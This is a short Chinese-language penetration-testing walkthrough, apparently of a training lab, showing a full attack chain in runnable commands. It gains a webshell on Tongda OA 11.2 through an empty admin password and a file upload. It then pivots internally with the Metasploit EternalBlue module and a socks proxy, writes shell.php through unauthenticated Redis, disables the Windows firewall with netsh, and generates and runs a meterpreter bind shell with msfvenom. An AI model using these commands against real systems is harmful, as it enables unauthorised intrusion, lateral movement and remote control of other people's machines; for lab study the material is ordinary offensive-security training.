nmap发现开放80端口
浏览器访问,是通达oa
可以搜索poc或者使用oa利用工具拿到shell
通过账号admin 密码滞空,进入后台
我们这里使用通达OA 11.2 后台getshell
点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录
点击系统管理 -> 附件管理 -> 添加存储目录
点击组织 -> 系统管理员 -> 上传附件
上传txt文件,抓包修改一句话木马,蚁剑或者哥斯拉连接
路径以及文件地址已给出,自行拼接,蚁剑getshell
信息收集,发现第二张网卡:
可以先让这台机器上线msf,建立路由,进行对20网段的渗透
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.135.152
set lhost 192.168.135.128
set lport 4444
run
添加一下路由
开启一下代理,可以进行内网渗透了
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
run
利用auxiliary/server/socks_proxy模块开启socks代理
use auxiliary/server/socks_proxy
set version 4a
run
redis未授权访问,写入webshell
proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save
哥斯拉连接
proxychains4 java -jar godzilla.jar
关闭win2016防火墙,上传msf生成的bind_shell
netsh advfirewall set allprofiles state off #关闭防火墙
msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
上传到哥斯拉,并执行